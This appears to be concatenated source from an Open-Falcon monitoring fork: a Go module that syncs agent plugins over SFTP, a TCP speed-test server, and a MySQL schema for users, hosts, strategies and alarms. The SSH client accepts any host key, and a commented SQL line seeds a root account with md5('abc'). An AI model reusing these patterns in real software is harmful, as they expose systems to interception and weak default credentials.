// you may not use this file except in compliance with the License. 
// You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package http import ( "fmt" log "github.com/Sirupsen/logrus" "github.com/golang/sftp" "github.com/open-falcon/falcon-plus/modules/agent/g" "github.com/open-falcon/falcon-plus/modules/agent/plugins" "github.com/toolkits/file" "golang.org/x/crypto/ssh" "io/ioutil" "net" "net/http" "os" "path/filepath" "strings" //"os/exec" "time" ) // TODO add by liyc 这里修改为sftp的模式,因为ssh是远程访问的核心 type Sftp_client struct { clientConfig *ssh.ClientConfig sshClient *ssh.Client sftpClient *sftp.Client pubkey ssh.AuthMethod } func (sshftp *Sftp_client) PublicKeyFile(keypath string) ssh.AuthMethod { if !file.IsExist(keypath) { return nil } buffer, err := ioutil.ReadFile(keypath) if err != nil { log.Debug("read ssh private file error" + err.Error()) return nil } key, err := ssh.ParsePrivateKey(buffer) if err != nil { log.Debug("ParsePrivateKey error" + err.Error()) return nil } return ssh.PublicKeys(key) } func (sshftp *Sftp_client) Sftp_close() { sshftp.sftpClient.Close() sshftp.sshClient.Close() } func (sshftp *Sftp_client) Connect_init() error { var err error = nil if len(g.Config().Plugin.Ssh.User) <= 0 { return fmt.Errorf("ssh user not defined!") } if len(g.Config().Plugin.Ssh.Ip_addr) <= 0 { return fmt.Errorf("ssh ip address not defined!") } if g.Config().Plugin.Ssh.Ip_port <= 0 { return fmt.Errorf("ssh ip port not defined!") } if len(g.Config().Plugin.Ssh.PrivateKey) <= 1 && len(g.Config().Plugin.Ssh.Password) <= 1 { return fmt.Errorf("ssh auth method not defined!,please use password or PrivateKey") } if len(g.Config().Plugin.Ssh.PrivateKey) >= 1 && 
len(g.Config().Plugin.Ssh.Password) >= 1 { log.Debug("ssh auth method password and PrivateKey both defined , PrivateKey default") } if len(g.Config().Plugin.Ssh.PrivateKey) > 1 { log.Debug("PrivateKey:" + g.Config().Plugin.Ssh.PrivateKey) sshftp.pubkey = sshftp.PublicKeyFile(g.Config().Plugin.Ssh.PrivateKey) } auth := make([]ssh.AuthMethod, 0) if sshftp.pubkey != nil { auth = append(auth, sshftp.pubkey) } else { auth = append(auth, ssh.Password(g.Config().Plugin.Ssh.Password)) } sshftp.clientConfig = &ssh.ClientConfig{ User: g.Config().Plugin.Ssh.User, Auth: auth, Timeout: 30 * time.Second, HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { return nil }, } // connet to ssh addr := fmt.Sprintf("%s:%d", g.Config().Plugin.Ssh.Ip_addr, g.Config().Plugin.Ssh.Ip_port) if sshftp.sshClient, err = ssh.Dial("tcp", addr, sshftp.clientConfig); err != nil { return err } // create sftp client if sshftp.sftpClient, err = sftp.NewClient(sshftp.sshClient); err != nil { return err } return nil } /* func configPluginRoutes() { http.HandleFunc("/plugin/update", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } dir := g.Config().Plugin.Dir parentDir := file.Dir(dir) file.InsureDir(parentDir) if file.IsExist(dir) { // git pull cmd := exec.Command("git", "pull") cmd.Dir = dir err := cmd.Run() if err != nil { w.Write([]byte(fmt.Sprintf("git pull in dir:%s fail. error: %s", dir, err))) return } } else { // git clone cmd := exec.Command("git", "clone", g.Config().Plugin.Git, file.Basename(dir)) cmd.Dir = parentDir err := cmd.Run() if err != nil { w.Write([]byte(fmt.Sprintf("git clone in dir:%s fail. 
error: %s", parentDir, err))) return } } w.Write([]byte("success")) }) http.HandleFunc("/plugin/reset", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } dir := g.Config().Plugin.Dir if file.IsExist(dir) { cmd := exec.Command("git", "reset", "--hard") cmd.Dir = dir err := cmd.Run() if err != nil { w.Write([]byte(fmt.Sprintf("git reset --hard in dir:%s fail. error: %s", dir, err))) return } } w.Write([]byte("success")) }) http.HandleFunc("/plugins", func(w http.ResponseWriter, r *http.Request) { //TODO: not thread safe RenderDataJson(w, plugins.Plugins) }) }*/ func sftp_get(reset_flag bool) (msg string, erra error) { dir := g.Config().Plugin.Dir parentDir := file.Dir(dir) file.InsureDir(parentDir) sshCli := Sftp_client{nil, nil, nil, nil} err := sshCli.Connect_init() if err != nil { return "open ssh fail", err } defer sshCli.Sftp_close() if file.IsExist(dir) { wl := sshCli.sftpClient.Walk(g.Config().Plugin.Ssh.Path) if err != nil { return fmt.Sprintf("update using ssh err in dir:%s fail. error: %s", dir, err), err } for wl.Step() { aRel, err := filepath.Rel(g.Config().Plugin.Ssh.Path, wl.Path()) if err != nil { return fmt.Sprintf("update using ssh get root path in dir:%s ,real path %s fail. error: %s", dir, wl.Path()), err } if aRel == "." || aRel == ".." { continue } //sftp文件信息 //log.Debug("ssh file:"+ wl.Path()) FileInfo, err := sshCli.sftpClient.Lstat(wl.Path()) if err != nil { return fmt.Sprintf("update using ssh get real path stat in :%s fail. 
error: %s", wl.Path(), err), err } lRpath := filepath.Join(dir, aRel) //log.Debug("ssh file: " + aRel + " ----- local file : " + lRpath) if strings.HasSuffix(aRel, ".pyc") { //.pyc 不同步,这个是运行后的二进制文件, continue } if FileInfo.Mode()&os.ModeSymlink != 0 { //创建软连接 link, _ := sshCli.sftpClient.ReadLink(wl.Path()) os.Symlink(link, lRpath) continue } else if !FileInfo.IsDir() { //处理文件,比较时间 if file.IsExist(lRpath) { //本地文件信息 lfile, err := os.Lstat(lRpath) if err != nil { return fmt.Sprintf("get local file info err :%s fail. error: %s", lRpath, err), err } if lfile.ModTime().Unix() >= FileInfo.ModTime().Unix() && !reset_flag { continue } } //这里关闭文件采用显示关闭,不然文件过多,出现标准的linux 错误:too many open file,因为defer的特性 srcFile, err := sshCli.sftpClient.Open(wl.Path()) //defer srcFile.Close() if err != nil { return fmt.Sprintf("open ssh file err :%s fail. error: %s", lRpath, err), err } dstFile, err := os.Create(lRpath) //defer dstFile.Close() if err != nil { return fmt.Sprintf("open local file err :%s fail. error: %s", lRpath, err), err } if _, err = srcFile.WriteTo(dstFile); err != nil { return fmt.Sprintf("write to local file err :%s fail. error: %s", lRpath, err), err } dstFile.Chmod(FileInfo.Mode()) fe := srcFile.Close() if fe != nil { log.Error("close ssh file err ! ", fe.Error()) } de := dstFile.Close() if de != nil { log.Error("close local plugin file err ! 
", de.Error()) } } else { file.InsureDir(lRpath) } } } else { log.Error("local plugin path [" + dir + "] not found") } return "Success", nil } func configPluginRoutes() { http.HandleFunc("/plugin/update", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } err_msg, err := sftp_get(false) if err != nil { w.Write([]byte("plugin not update : [" + err_msg + "-" + err.Error() + "]")) return } w.Write([]byte("success")) }) http.HandleFunc("/plugin/reset", func(w http.ResponseWriter, r *http.Request) { if !g.Config().Plugin.Enabled { w.Write([]byte("plugin not enabled")) return } err_msg, err := sftp_get(true) if err != nil { w.Write([]byte("plugin not reset: [" + err_msg + "-" + err.Error() + "]")) return } w.Write([]byte("success")) }) http.HandleFunc("/plugins", func(w http.ResponseWriter, r *http.Request) { //TODO: not thread safe RenderDataJson(w, plugins.Plugins) }) } <file_sep>/modules/agent/speedtest/speedtest.go package speedtest import ( "fmt" log "github.com/Sirupsen/logrus" "math" "net" "strconv" "strings" "sync/atomic" "time" "unicode" ) type BytesPerTime struct { Bytes uint64 Duration time.Duration } type UUID [16]byte var timeBase = time.Date(1582, time.October, 15, 0, 0, 0, 0, time.UTC).Unix() var hardwareAddr []byte var clockSeq uint32 func TimeUUID() UUID { return FromTime(time.Now()) } const ( // UNO represents 1 unit. UNO = 1 // KILO represents k. KILO = 1024 // MEGA represents m. MEGA = 1024 * 1024 // GIGA represents g. GIGA = 1024 * 1024 * 1024 // TERA represents t. 
TERA = 1024 * 1024 * 1024 * 1024 ) func unitToNumber(s string) uint64 { s = strings.TrimSpace(s) s = strings.ToUpper(s) i := strings.IndexFunc(s, unicode.IsLetter) if i == -1 { bytes, err := strconv.ParseFloat(s, 64) if err != nil || bytes <= 0 { return 0 } return uint64(bytes) } bytesString, multiple := s[:i], s[i:] bytes, err := strconv.ParseFloat(bytesString, 64) if err != nil || bytes <= 0 { return 0 } switch multiple { case "T", "TB", "TIB": return uint64(bytes * TERA) case "G", "GB", "GIB": return uint64(bytes * GIGA) case "M", "MB", "MIB": return uint64(bytes * MEGA) case "K", "KB", "KIB": return uint64(bytes * KILO) case "B": return uint64(bytes) default: return 0 } } func FromTime(aTime time.Time) UUID { var u UUID utcTime := aTime.In(time.UTC) t := uint64(utcTime.Unix()-timeBase)*10000000 + uint64(utcTime.Nanosecond()/100) u[0], u[1], u[2], u[3] = byte(t>>24), byte(t>>16), byte(t>>8), byte(t) u[4], u[5] = byte(t>>40), byte(t>>32) u[6], u[7] = byte(t>>56)&0x0F, byte(t>>48) clock := atomic.AddUint32(&clockSeq, 1) u[8] = byte(clock >> 8) u[9] = byte(clock) copy(u[10:], hardwareAddr) u[6] |= 0x10 // set version to 1 (time based uuid) u[8] &= 0x3F // clear variant u[8] |= 0x80 // set to IETF variant return u } func (u UUID) String() string { var offsets = [...]int{0, 2, 4, 6, 9, 11, 14, 16, 19, 21, 24, 26, 28, 30, 32, 34} const hexString = "0123456789abcdef" r := make([]byte, 36) for i, b := range u { r[offsets[i]] = hexString[b>>4] r[offsets[i]+1] = hexString[b&0xF] } r[8] = '-' r[13] = '-' r[18] = '-' r[23] = '-' return string(r) } func IBytes(s uint64) string { sizes := []string{"B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB"} return humanateBytes(s, 1024, sizes) } func logn(n, b float64) float64 { return math.Log(n) / math.Log(b) } func humanateBytes(s uint64, base float64, sizes []string) string { if s < 10 { return fmt.Sprintf("%d B", s) } e := math.Floor(logn(float64(s), base)) suffix := sizes[int(e)] val := math.Floor(float64(s)/math.Pow(base, e)*10+0.5) 
/ 10 f := "%.0f %s" if val < 10 { f = "%.1f %s" } return fmt.Sprintf(f, val, suffix) } func SendData(conn net.Conn, buffer []byte) (size int, err error) { w, err := conn.Write(buffer) if err != nil { return 0, fmt.Errorf("Error while writing: %s", err) } //log.Info("write data "+strconv.Itoa(w)) if w != len(buffer) { return w, fmt.Errorf("Error while writing size: %s", w) } return w, nil } func ReceiveData(conn net.Conn, buffersize uint64) error { b := make([]byte, buffersize) defer conn.Close() //var t int =0 for { w, err := conn.Read(b) if err != nil { if err.Error() == "EOF" { return nil } else { return fmt.Errorf("Read: %d, Error: %s in conn read ", w, err) } } //t=t+w; //if t < buffersize{ // continue //} if w == 16 { log.Info("reback uuid=======") m := make([]byte, 0) for i := 0; i < 16; i++ { m = append(m, b[i]) } w, err := conn.Write(m) if err != nil { return fmt.Errorf("Read: %d, Error: %s in seand uuid", w, err) } } } } <file_sep>/modules/agent/speedtest/server.go package speedtest // author liyc // 本期client的uuid不做验证,意义不大 //本期只支持client->server 模式 import ( log "github.com/Sirupsen/logrus" "github.com/open-falcon/falcon-plus/modules/agent/g" "net" "strconv" ) func Server() { port := ":" + strconv.Itoa(g.Config().Net_speed.Port) buffersize := unitToNumber(g.Config().Net_speed.BufLen) ln, err := net.Listen("tcp", port) if err != nil { log.Fatalf("Could not listen on %s: %s", port, err) } go func(l net.Listener) { defer l.Close() for { conn, err := l.Accept() if err != nil { log.Printf("Error accepting new bandwidth connection: %v", err) continue } log.Printf("Accepted connection from %s", conn.RemoteAddr()) go handleConnection(conn, buffersize) } }(ln) } func handleConnection(conn net.Conn, buffersize uint64) { err := ReceiveData(conn, buffersize) if err != nil { log.Printf("Error: %s", err) return } } <file_sep>/scripts/mysql/db_schema/db-one-schema.sql create database monitor DEFAULT CHARACTER SET utf8 DEFAULT COLLATE utf8_general_ci; USE monitor; SET NAMES 
utf8;

/* ---------------------------------------------uic--------------------------------------*/
DROP TABLE if exists team;
CREATE TABLE `team` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(64) NOT NULL,
  `resume` varchar(255) not null default '',
  `creator` int(10) unsigned NOT NULL DEFAULT '0',
  `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_team_name` (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/**
 * role: -1:blocked 0:normal 1:admin 2:root
 */
DROP TABLE if exists `user`;
CREATE TABLE `user` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(64) NOT NULL,
  `passwd` varchar(64) not null default '',
  `cnname` varchar(128) not null default '',
  `email` varchar(255) not null default '',
  `phone` varchar(16) not null default '',
  `im` varchar(32) not null default '',
  `qq` varchar(16) not null default '',
  `role` tinyint not null default 0,
  `creator` int(10) unsigned NOT NULL DEFAULT 0,
  `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_user_name` (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/* membership relation between teams and users */
DROP TABLE if exists `rel_team_user`;
CREATE TABLE `rel_team_user` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `tid` int(10) unsigned not null,
  `uid` int(10) unsigned not null,
  PRIMARY KEY (`id`),
  KEY `idx_rel_tid` (`tid`),
  KEY `idx_rel_uid` (`uid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

DROP TABLE if exists `session`;
CREATE TABLE `session` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `uid` int(10) unsigned not null,
  `sig` varchar(32) not null,
  `expired` int(10) unsigned not null,
  PRIMARY KEY (`id`),
  KEY `idx_session_uid` (`uid`),
  KEY `idx_session_sig` (`sig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*900150983cd24fb0d6963f7d28e17f72*/
/*insert into `user`(`name`, `passwd`, `role`, `created`) values('root', md5('abc'), 2, now());*/

/*---------------------------------------------portal -----------------------------------------*/
/**
 * Hosts are synced from the machine-management system.
 * For a standalone deployment, hbs must be extended so that hosts seen in
 * heartbeats are written into the host table.
 */
DROP TABLE IF EXISTS host;
CREATE TABLE host (
  id INT UNSIGNED NOT NULL AUTO_INCREMENT,
  hostname VARCHAR(255) NOT NULL DEFAULT '',
  ip VARCHAR(16) NOT NULL DEFAULT '',
  agent_version VARCHAR(16) NOT NULL DEFAULT '',
  plugin_version VARCHAR(128) NOT NULL DEFAULT '',
  maintain_begin INT UNSIGNED NOT NULL DEFAULT 0,
  maintain_end INT UNSIGNED NOT NULL DEFAULT 0,
  update_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
  PRIMARY KEY (id),
  UNIQUE KEY idx_host_hostname (hostname)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

/**
 * Host group info.
 * come_from 0: synced from machine management; 1: created from the web UI.
 */
DROP TABLE IF EXISTS grp;
CREATE TABLE `grp` (
  id INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  grp_name VARCHAR(255) NOT NULL DEFAULT '',
  create_user VARCHAR(64) NOT NULL DEFAULT '',
  create_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
  come_from TINYINT(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (id),
  UNIQUE KEY idx_host_grp_grp_name (grp_name)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

DROP TABLE IF EXISTS grp_host;
CREATE TABLE grp_host (
  grp_id INT UNSIGNED NOT NULL,
  host_id INT UNSIGNED NOT NULL,
  KEY idx_grp_host_grp_id (grp_id),
  KEY idx_grp_host_host_id (host_id)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

/**
 * Monitoring strategy template.
 * tpl_name is globally unique; prefixes such as "sa.falcon.base" are advised.
 */
DROP TABLE IF EXISTS tpl;
CREATE TABLE tpl (
  id INT UNSIGNED NOT NULL AUTO_INCREMENT,
  tpl_name VARCHAR(255) NOT NULL DEFAULT '',
  parent_id INT UNSIGNED NOT NULL DEFAULT 0,
  action_id INT UNSIGNED NOT NULL DEFAULT 0,
  create_user VARCHAR(64) NOT NULL DEFAULT '',
  create_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (id),
  UNIQUE KEY idx_tpl_name (tpl_name),
  KEY idx_tpl_create_user (create_user)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

DROP TABLE IF EXISTS strategy;
CREATE TABLE `strategy` (
  `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  `metric` VARCHAR(128) NOT NULL DEFAULT '',
  `tags` VARCHAR(256) NOT NULL DEFAULT '',
  `max_step` INT(11) NOT NULL DEFAULT '1',
  `priority` TINYINT(4) NOT NULL DEFAULT '0',
  `func` VARCHAR(16) NOT NULL DEFAULT 'all(#1)',
  `op` VARCHAR(8) NOT NULL DEFAULT '',
  `right_value` VARCHAR(64) NOT NULL,
  `note` VARCHAR(128) NOT NULL DEFAULT '',
  `run_begin` VARCHAR(16) NOT NULL DEFAULT '',
  `run_end` VARCHAR(16) NOT NULL DEFAULT '',
  `tpl_id` INT(10) UNSIGNED NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_strategy_tpl_id` (`tpl_id`)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

DROP TABLE IF EXISTS expression;
CREATE TABLE `expression` (
  `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  `expression` VARCHAR(1024) NOT NULL,
  `func` VARCHAR(16) NOT NULL DEFAULT 'all(#1)',
  `op` VARCHAR(8) NOT NULL DEFAULT '',
  `right_value` VARCHAR(16) NOT NULL DEFAULT '',
  `max_step` INT(11) NOT NULL DEFAULT '1',
  `priority` TINYINT(4) NOT NULL DEFAULT '0',
  `note` VARCHAR(1024) NOT NULL DEFAULT '',
  `action_id` INT(10) UNSIGNED NOT NULL DEFAULT '0',
  `create_user` VARCHAR(64) NOT NULL DEFAULT '',
  `pause` TINYINT(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

DROP TABLE IF EXISTS grp_tpl;
CREATE TABLE `grp_tpl` (
  `grp_id` INT(10) UNSIGNED NOT NULL,
  `tpl_id` INT(10) UNSIGNED NOT NULL,
  `bind_user` VARCHAR(64) NOT NULL DEFAULT '',
  KEY `idx_grp_tpl_grp_id` (`grp_id`),
  KEY `idx_grp_tpl_tpl_id` (`tpl_id`)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

CREATE TABLE `plugin_dir` (
  `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  `grp_id` INT(10) UNSIGNED NOT NULL,
  `dir` VARCHAR(255) NOT NULL,
  `create_user` VARCHAR(64) NOT NULL DEFAULT '',
  `create_at` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  KEY `idx_plugin_dir_grp_id` (`grp_id`)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

DROP TABLE IF EXISTS action;
CREATE TABLE `action` (
  `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  `uic` VARCHAR(255) NOT NULL DEFAULT '',
  `url` VARCHAR(255) NOT NULL DEFAULT '',
  `callback` TINYINT(4) NOT NULL DEFAULT '0',
  `before_callback_sms` TINYINT(4) NOT NULL DEFAULT '0',
  `before_callback_mail` TINYINT(4) NOT NULL DEFAULT '0',
  `after_callback_sms` TINYINT(4) NOT NULL DEFAULT '0',
  `after_callback_mail` TINYINT(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

/**
 * nodata mock config
 */
DROP TABLE IF EXISTS `mockcfg`;
CREATE TABLE `mockcfg` (
  `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT,
  `name` VARCHAR(255) NOT NULL DEFAULT '' COMMENT 'name of mockcfg, used for uuid',
  `obj` VARCHAR(10240) NOT NULL DEFAULT '' COMMENT 'desc of object',
  `obj_type` VARCHAR(255) NOT NULL DEFAULT '' COMMENT 'type of object, host or group or other',
  `metric` VARCHAR(128) NOT NULL DEFAULT '',
  `tags` VARCHAR(1024) NOT NULL DEFAULT '',
  `dstype` VARCHAR(32) NOT NULL DEFAULT 'GAUGE',
  `step` INT(11) UNSIGNED NOT NULL DEFAULT 60,
  `mock` DOUBLE NOT NULL DEFAULT 0 COMMENT 'mocked value when nodata occurs',
  `creator` VARCHAR(64) NOT NULL DEFAULT '',
  `t_create` DATETIME NOT NULL COMMENT 'create time',
  `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time',
  PRIMARY KEY (`id`),
  UNIQUE KEY `uniq_name` (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

/**
 * aggregator cluster metric config table
 */
DROP TABLE IF EXISTS `cluster`;
CREATE TABLE `cluster` (
  `id` INT UNSIGNED NOT NULL AUTO_INCREMENT,
  `grp_id` INT NOT NULL,
  `numerator` VARCHAR(10240) NOT NULL,
  `denominator` VARCHAR(10240) NOT NULL,
  `endpoint` VARCHAR(255) NOT NULL,
  `metric` VARCHAR(255) NOT NULL,
  `tags` VARCHAR(255) NOT NULL,
  `ds_type` VARCHAR(255) NOT NULL,
  `step` INT NOT NULL,
  `last_update` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `creator` VARCHAR(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE =InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

/**
 * alert links
 */
DROP TABLE IF EXISTS alert_link;
CREATE TABLE alert_link (
  id INT UNSIGNED NOT NULL AUTO_INCREMENT,
  path VARCHAR(16) NOT NULL DEFAULT '',
  content TEXT NOT NULL,
  create_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (id),
  UNIQUE KEY alert_path(path)
) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci;

/* ------------------------------------dashboard---------------------------------- */
DROP TABLE IF EXISTS `dashboard_graph`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dashboard_graph` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` char(128) NOT NULL,
  `hosts` varchar(10240) NOT NULL DEFAULT '',
  `counters` varchar(1024) NOT NULL DEFAULT '',
  `screen_id` int(11) unsigned NOT NULL,
  `timespan` int(11) unsigned NOT NULL DEFAULT '3600',
  `graph_type` char(2) NOT NULL DEFAULT 'h',
  `method` char(8) DEFAULT '',
  `position` int(11) unsigned NOT NULL DEFAULT '0',
  `falcon_tags` varchar(512) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_sid` (`screen_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `dashboard_screen`
--
DROP TABLE IF EXISTS `dashboard_screen`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dashboard_screen` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `pid` int(11) unsigned NOT NULL DEFAULT '0',
  `name` char(128) NOT NULL,
  `time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  KEY `idx_pid` (`pid`),
  UNIQUE KEY `idx_pid_n` (`pid`,`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `tmp_graph`
--
DROP TABLE IF EXISTS `tmp_graph`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `tmp_graph` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `endpoints` varchar(10240) NOT NULL DEFAULT '',
  `counters` varchar(10240) NOT NULL DEFAULT '',
  `ck` varchar(32) NOT NULL,
  `time_` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_ck` (`ck`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

/*-----------------------------------------------graph---------------------------------------*/
DROP TABLE if exists `endpoint`;
CREATE TABLE `endpoint` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `endpoint` varchar(255) NOT NULL DEFAULT '',
  `ts` int(11) DEFAULT NULL,
  `t_create` DATETIME NOT NULL COMMENT 'create time',
  `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_endpoint` (`endpoint`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

DROP TABLE if exists `endpoint_counter`;
CREATE TABLE `endpoint_counter` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `endpoint_id` int(10) unsigned NOT NULL,
  `counter` varchar(255) NOT NULL DEFAULT '',
  `step` int(11) not null default 60 comment 'in second',
  `type` varchar(16) not null comment 'GAUGE|COUNTER|DERIVE',
  `ts` int(11) DEFAULT NULL,
  `t_create` DATETIME NOT NULL COMMENT 'create time',
  `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_endpoint_id_counter` (`endpoint_id`, `counter`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

DROP TABLE if exists `tag_endpoint`;
CREATE TABLE `tag_endpoint` (
  `id` int(10)
unsigned NOT NULL AUTO_INCREMENT, `tag` varchar(255) NOT NULL DEFAULT '' COMMENT 'srv=tv', `endpoint_id` int(10) unsigned NOT NULL, `ts` int(11) DEFAULT NULL, `t_create` DATETIME NOT NULL COMMENT 'create time', `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time', PRIMARY KEY (`id`), UNIQUE KEY `idx_tag_endpoint_id` (`tag`, `endpoint_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /* --------------------------------------------------alarms------------------------------------------*/ /* * 建立告警归档资料表, 主要存储各个告警的最后触发状况 */ DROP TABLE IF EXISTS event_cases; CREATE TABLE IF NOT EXISTS event_cases( id VARCHAR(50), endpoint VARCHAR(100) NOT NULL, metric VARCHAR(200) NOT NULL, func VARCHAR(50), cond VARCHAR(200) NOT NULL, note VARCHAR(500), max_step int(10) unsigned, current_step int(10) unsigned, priority INT(6) NOT NULL, status VARCHAR(20) NOT NULL, timestamp Timestamp NOT NULL, update_at Timestamp NULL DEFAULT NULL, closed_at Timestamp NULL DEFAULT NULL, closed_note VARCHAR(250), user_modified int(10) unsigned, tpl_creator VARCHAR(64), expression_id int(10) unsigned, strategy_id int(10) unsigned, template_id int(10) unsigned, process_note MEDIUMINT, process_status VARCHAR(20) DEFAULT 'unresolved', PRIMARY KEY (id), INDEX (endpoint, strategy_id, template_id) ) ENGINE =InnoDB DEFAULT CHARSET =utf8; /* * 建立告警归档资料表, 存储各个告警触发状况的历史状态 */ DROP TABLE IF EXISTS events; CREATE TABLE IF NOT EXISTS events ( id int(10) NOT NULL AUTO_INCREMENT, event_caseId VARCHAR(50), step int(10) unsigned, cond VARCHAR(200) NOT NULL, status int(3) unsigned DEFAULT 0, timestamp Timestamp, PRIMARY KEY (id), INDEX(event_caseId), FOREIGN KEY (event_caseId) REFERENCES event_cases(id) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE =InnoDB DEFAULT CHARSET =utf8; /* * 告警留言表 */ CREATE TABLE IF NOT EXISTS event_note ( id MEDIUMINT NOT NULL AUTO_INCREMENT, event_caseId VARCHAR(50), note VARCHAR(300), case_id VARCHAR(20), status VARCHAR(15), timestamp Timestamp, 
user_id int(10) unsigned, PRIMARY KEY (id), INDEX (event_caseId), FOREIGN KEY (event_caseId) REFERENCES event_cases(id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY (user_id) REFERENCES user(id) ON DELETE CASCADE ON UPDATE CASCADE );
